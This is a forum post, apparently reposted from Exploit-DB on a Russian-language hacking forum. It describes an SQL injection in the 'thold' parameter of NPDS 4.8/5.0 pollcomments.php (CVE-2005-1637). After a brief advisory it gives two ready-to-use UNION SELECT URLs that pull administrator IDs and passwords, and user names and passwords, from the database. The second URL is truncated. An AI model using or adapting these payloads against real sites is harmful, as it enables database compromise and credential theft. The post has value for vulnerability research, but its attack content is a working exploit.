Exploit NPDS 4.8/5.0 - 'pollcomments.php?thold' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25672
Проверка EDB
  1. Пройдено
Автор
NOSP
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2005-1637
Дата публикации
2005-05-16
Код:
source: https://www.securityfocus.com/bid/13649/info
 
NPDS is prone to an SQL injection vulnerability.
 
This issue is due to a failure in the application to properly sanitize user-supplied input to the 'thold' parameter.
 
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
 
All versions are considered to be vulnerable at the moment.

http://www.example.com/npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM %20authors

http://www.example.com/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20u
 
Источник
www.exploit-db.com

Похожие темы